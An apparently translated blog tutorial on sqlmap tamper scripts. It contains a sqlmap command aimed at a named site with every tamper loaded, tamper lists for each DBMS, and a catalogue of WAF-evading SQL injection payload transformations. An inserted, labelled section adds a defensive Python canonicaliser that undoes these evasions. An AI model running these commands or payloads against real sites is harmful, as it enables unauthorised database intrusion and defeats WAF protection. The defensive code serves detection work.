SQLMap Tamper Scripts (SQL Injection and WAF bypass)

    Hello pixel friends, this time I want to give a short explanation of SQLMap Tamper Scripts (SQL Injection and WAF bypass). Did you know? Inside the sqlmap tool there is a set of scripts (tamper scripts); each script has a different function, and one of those functions is bypassing a WAF (Web Application Firewall). If you don't have SQLMap yet, you can look at my previous post. Let's get straight to how the tamper scripts are used.

    Use and load all tamper scripts to evade filters and WAF 
    $ sqlmap.py --url "http://www.pixel-code.ga/news.php?id=3" --level=5 --risk=3 -v 3 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

    The lists below can serve as a reference for testing tamper scripts against a specific DBMS:

    General Tamper Scripts
    tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

    MSSQL
    tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

    MySQL
    tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

    For those who don't yet know what each tamper script actually does, here is the list:
    List of SQLMap tamper scripts with explanations

    apostrophemask
    Function: Replace the apostrophe with its UTF-8 fullwidth counterpart (%EF%BC%87)
    Platform: All
    Example:
    1 AND '1'='1 ==> 1 AND %EF%BC%871%EF%BC%87=%EF%BC%871

    apostrophenullencode
    Function: ' ==> %00%27
    Platform: All
    Example:
    1 AND '1'='1 ==> 1 AND %00%271%00%27=%00%271

    appendnullbyte
    Function: Append a NULL byte (%00) to the end of the payload
    Platform: Microsoft Access
    Example:
    1 AND 1=1 ==> 1 AND 1=1%00

    base64encode
    Function: base64 encode
    Platform: All
    Example:
    1' AND SLEEP(5)# ==> MScgQU5EIFNMRUVQKDUpIw==

    between
    Function: > ==> NOT BETWEEN 0 AND
    Platform: Mssql 2005, MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL 8.3, 8.4, 9.0
    Example:
    1 AND A > B-- ==> 1 AND A NOT BETWEEN 0 AND B--
    1 AND A = B-- ==> 1 AND A BETWEEN B AND B--

    bluecoat
    Function: Space ==> %09
    Platform: MySQL 5.1, SGOS
    Example:
    SELECT id FROM users WHERE id = 1 ==> SELECT%09id FROM%09users WHERE%09id LIKE 1

    chardoubleencode
    Function: Double url encoding
    Platform: All
    Example:
    SELECT FIELD FROM%20TABLE ==> %2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545

    charencode
    Function: url encoding
    Platform: Mssql 2005, MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL 8.3, 8.4, 9.0
    Example:
    SELECT FIELD FROM%20TABLE ==> %53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45

    charunicodeencode
    Function: Unicode URL encoding (%uXXXX)
    Platform: Mssql 2000, 2005, MySQL 5.1.56, PostgreSQL 9.0.3 (ASP/ASP.NET)
    Example:
    SELECT FIELD%20FROM TABLE ==> %u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045

    commalesslimit
    Function: limit 2,3 ==> LIMIT 3 OFFSET 2
    Platform: MySQL 5.0 and 5.5
    Example:
    LIMIT 2, 3 ==> LIMIT 3 OFFSET 2

    commalessmid
    Function: MID(VERSION(), 1, 1) ==> MID(VERSION() FROM 1 FOR 1)
    Platform: MySQL 5.0 and 5.5
    Example:
    MID(VERSION(), 1, 1) ==> MID(VERSION() FROM 1 FOR 1)

    concat2concatws
    Function: CONCAT() ==> CONCAT_WS()
    Platform: MySQL 5.0
    Example:
    CONCAT(1,2) ==> CONCAT_WS(MID(CHAR(0),0,0),1,2)

    equaltolike
    Function: = ==> like
    Platform: Mssql 2005, MySQL 4, 5.0 and 5.5
    Example:
    SELECT * FROM users WHERE id=1 ==> SELECT * FROM users WHERE id LIKE 1

    escapequotes
    Function: ' ==> \', " ==> \"
    Platform: All
    Example:
    1" AND SLEEP(5)# ==> 1\" AND SLEEP(5)#

    greatest
    Function: > ==> GREATEST
    Platform: MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL 8.3, 8.4, 9.0
    Example:
    1 AND A > B ==> 1 AND GREATEST(A,B+1)=A

    halfversionedmorekeywords
    Function: Prefix each keyword with /*!0
    Platform: MySQL 4.0.18, 5.0.22
    Example:
    union ==> /*!0union

    ifnull2ifisnull
    Function: IFNULL(A, B) ==> IF(ISNULL(A), B, A)
    Platform: MySQL 5.0 and 5.5
    Example:
    IFNULL(1, 2) ==> IF(ISNULL(1),2,1)

    informationschemacomment
    Function: Space ==> /**/
    Platform: MySQL
    Example:
    SELECT table_name FROM INFORMATION_SCHEMA.TABLES ==> SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES

    lowercase
    Function: INSERT ==> insert
    Platform: Mssql 2005, MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL 8.3, 8.4, 9.0
    Example:
    SELECT table_name FROM INFORMATION_SCHEMA.TABLES ==> select table_name from information_schema.tables

    modsecurityversioned
    Function: AND ==> /*!12345AND*/ (the version number comes from the fingerprinted MySQL version)
    Platform: MySQL 5.0
    Example:
    1 AND 2>1-- ==> 1 /*!30874AND 2>1*/--

    multiplespaces
    Function: Space ==> Multiple spaces
    Platform: All
    Example:
    1 UNION SELECT foobar ==> 1  UNION   SELECT    foobar

    nonrecursivereplacement
    Function: union ==> uniunionon
    Platform: All
    Example:
    1 UNION SELECT 2-- ==> 1 UNION SELESELECTCT 2--

    overlongutf8
    Function: Overlong UTF-8 encoding
    Platform: All
    Example:
    SELECT FIELD FROM TABLE WHERE 2>1 ==> SELECT%C0%AAFIELD%C0%AAFROM%C0%AATABLE%C0%AAWHERE%C0%AA2%C0%BE1

    percentage
    Function: select ==> s%e%l%e%c%t
    Platform: Mssql 2000, 2005, MySQL 5.1.56, 5.5.11, PostgreSQL 9.0
    Example:
    SELECT FIELD FROM TABLE ==> %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E

    randomcase
    Function: INSERT ==> INseRt
    Platform: Mssql 2005, MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL 8.3, 8.4, 9.0
    Example:
    INSERT ==> InseRt

    randomcomments
    Function: INSERT ==> I/**/N/**/SERT
    Platform: Mysql
    Example:
    INSERT ==> I/**/N/**/SERT

    securesphere
    Function: 1 AND 1=1 ==> 1 AND 1=1 and '0having'='0having'
    Platform: All
    Example:
    1 AND 1=1 ==> 1 AND 1=1 and '0having'='0having'

    sp_password
    Function: Space ==> sp_password
    Platform: Mssql
    Example:
    1 AND 9227=9227-- ==> 1 AND 9227=9227-- sp_password

    space2comment
    Function: Space ==> /**/
    Platform: Mssql 2005, MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL 8.3, 8.4, 9.0
    Example:
    SELECT id FROM users ==> SELECT/**/id/**/FROM/**/users

    space2dash
    Function: Space ==> --nVNaVoPYeva%0A
    Platform: MSSQL, SQLite
    Example:
    1 AND 9227=9227 ==> 1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227

    space2hash
    Function: Space ==> %23nVNaVoPYeva%0A
    Platform: MySQL 4.0, 5.0
    Example:
    1 AND 9227=9227 ==> 1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227

    space2morehash
    Function: Space ==> %23ngNvzqu%0A
    Platform: MySQL 5.1.41
    Example:
    1 AND 9227=9227 ==> 1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227

    space2mssqlblank
    Function: Space ==> %0E
    Platform: Mssql 2000,2005
    Example:
    SELECT id FROM users ==> SELECT%0Eid%0DFROM%07users

    space2mssqlhash
    Function: Space ==> %23%0A
    Platform: Mssql, Mysql
    Example:
    1 AND 9227=9227 ==> 1%23%0AAND%23%0A9227=9227

    space2mysqlblank
    Function: Space ==> %0B, %0D, %0C
    Platform: Mysql 5.1
    Example:
    SELECT id FROM users ==> SELECT%0Bid%0DFROM%0Cusers

    space2mysqldash
    Function: Space ==> --%0A
    Platform: Mssql, Mysql
    Example:
    1 AND 9227=9227 ==> 1--%0AAND--%0A9227=9227

    space2plus
    Function: Space ==> +
    Platform: All
    Example:
    SELECT id FROM users ==> SELECT+id+FROM+users

    space2randomblank
    Function: Space ==> %0D, %0A, %0C, %09
    Platform: Mssql 2005, MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL 8.3, 8.4, 9.0
    Example:
    SELECT id FROM users ==> SELECT%0Did%0DFROM%0Ausers

    symboliclogical
    Function: and ==> %26%26
    Platform: All
    Example:
    1 AND '1'='1 ==> 1 %26%26 '1'='1

    unionalltounion
    Function: UNION ALL SELECT ==> UNION SELECT
    Platform: All
    Example:
    -1 UNION ALL SELECT ==> -1 UNION SELECT

    unmagicquotes
    Function: ' ==> %df%27
    Platform: Mysql magic_quotes/addslashes
    Example:
    1' AND 1=1 ==> 1%bf%27 AND 1=1--

    uppercase
    Function: Lower case to upper case
    Platform: Mssql 2005, MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL 8.3, 8.4, 9.0
    Example:
    insert ==> INSERT

    varnish
    Function: Append an X-originating-IP header
    Example:
    X-originating-IP: 127.0.0.1

    versionedkeywords
    Function: union ==> /*!union*/
    Platform: MySQL 4.0.18, 5.1.56, 5.5.11
    Example:
    1 union select user() ==> 1/*!UNION*//*!SELECT*/user()

    xforwardedfor
    Function: Append a random X-Forwarded-For header
    Platform: All
    Example:
    X-Forwarded-For: 127.0.0.1
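    Every transformation in the list above targets the same weakness: a filter that matches signatures on the raw parameter value instead of on the value the database will actually see. The example below is added here and is not code from this post or from sqlmap; it is a small defender-side canonicaliser in Python that undoes the encodings and comment tricks listed above (single and double URL encoding, %uXXXX, fullwidth quotes, stray percent signs, inline and versioned comments, newline-terminated comments, whitespace variants) and then runs a deliberately crude signature over the result. The sample inputs are constructed from the right-hand sides of the examples above, and the signature regex and the keyword list are illustrative assumptions, not a production ruleset. The last two helpers show why the nonrecursivereplacement trick works: a sanitizer that deletes keywords once reassembles the payload, whereas deleting until the input stops changing does not (rejecting the input or using parameterised queries is better than either).

```python
import re
import unicodedata
import urllib.parse

# Constructed sample inputs: the right-hand sides of several tamper examples
# from the list above, as a WAF or log parser would see them in a query string.
SAMPLES = {
    "charencode": "%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45",
    "chardoubleencode": "%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544"
                        "%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545",
    "charunicodeencode": "%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045"
                         "%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045",
    "percentage": "%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E",
    "apostrophemask": "1 AND %EF%BC%871%EF%BC%87=%EF%BC%871",
    "space2comment": "SELECT/**/id/**/FROM/**/users",
    "space2randomblank": "SELECT%0Did%0DFROM%0Ausers",
    "space2hash": "1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227",
    "versionedkeywords": "1/*!UNION*//*!SELECT*/user()",
    "randomcomments": "I/**/N/**/SERT",
}

# Deliberately crude signature set (an assumption for this example): the point
# is what text it is run over, not how good the rule is.
SIGNATURES = re.compile(
    r"\b(?:UNION\s+(?:ALL\s+)?SELECT|SELECT\s+\S+\s+FROM|INSERT|AND\s+\S+?\s*=\s*\S+)\b",
    re.I,
)

def decode_layers(s: str, rounds: int = 3) -> str:
    """Undo %uXXXX and %XX encoding until the text stops changing; the loop is
    what unwraps double encoding (chardoubleencode)."""
    for _ in range(rounds):
        new = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), s)
        new = urllib.parse.unquote(new)      # invalid %XX sequences are left as they are
        if new == s:
            break
        s = new
    return s

def normalize(s: str, comments_to: str = " ") -> str:
    """Canonical form of a parameter value for signature matching.
    comments_to is what a plain /* */ comment becomes: a DBMS may treat it as
    whitespace or as nothing, so the detector checks both rather than assuming."""
    s = decode_layers(s)
    s = unicodedata.normalize("NFKC", s)             # fullwidth apostrophe U+FF07 -> '
    s = re.sub(r"%(?![0-9A-Fa-f]{2})", "", s)        # stray %, as ASP/IIS drop them (percentage)
    s = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", s, flags=re.S)  # MySQL executes the body of /*!...*/
    s = re.sub(r"/\*.*?\*/", comments_to, s, flags=re.S)
    s = re.sub(r"(?:--|#)[^\n]*\n", " ", s)          # comment ended by a newline (space2hash/space2dash)
    return re.sub(r"\s+", " ", s).strip().upper()

def naive_is_sqli(s: str) -> bool:
    """Signature match on the raw value: the check the tampers above are built to evade."""
    return SIGNATURES.search(s) is not None

def is_sqli(s: str) -> bool:
    """Signature match on every canonical form of the value."""
    return any(SIGNATURES.search(normalize(s, c)) for c in (" ", ""))

# nonrecursivereplacement targets a sanitizer that deletes keywords. Deleting once
# reassembles the payload; deleting until nothing changes does not.
KEYWORDS = ("UNION", "SELECT")   # illustrative blocklist, an assumption for this example

def strip_keywords_once(s: str) -> str:
    for kw in KEYWORDS:
        s = re.sub(kw, "", s, flags=re.I)
    return s

def strip_keywords_recursive(s: str) -> str:
    while True:
        new = strip_keywords_once(s)
        if new == s:
            return s
        s = new

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:18} raw={naive_is_sqli(raw)!s:5} normalized={is_sqli(raw)!s:5} -> {normalize(raw)!r}")
    doubled = "1 UNIUNIONON SELESELECTCT 2--"
    print("strip once     :", repr(strip_keywords_once(doubled)))
    print("strip recursive:", repr(strip_keywords_recursive(doubled)))
```

Run it as a script to see, per sample, whether the raw signature check fires, whether the normalised check fires, and what the canonical form looks like. The canonicaliser is lossy on purpose (for instance it drops a literal `%` that a LIKE pattern might legitimately contain), which is fine for matching but is one more reason the real fix for injection is parameterised queries on the application side rather than a smarter filter in front of it.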

    How was that? Pretty easy to understand and put into practice, right? Oh, and only practise it on things you're allowed to, hehe. OK, that's all for now, don't forget to share and see you next time~

    Source :
    https://medium.com/@drag0n/sqlmap-tamper-scripts-sql-injection-and-waf-bypass-c5a3f5764cb3
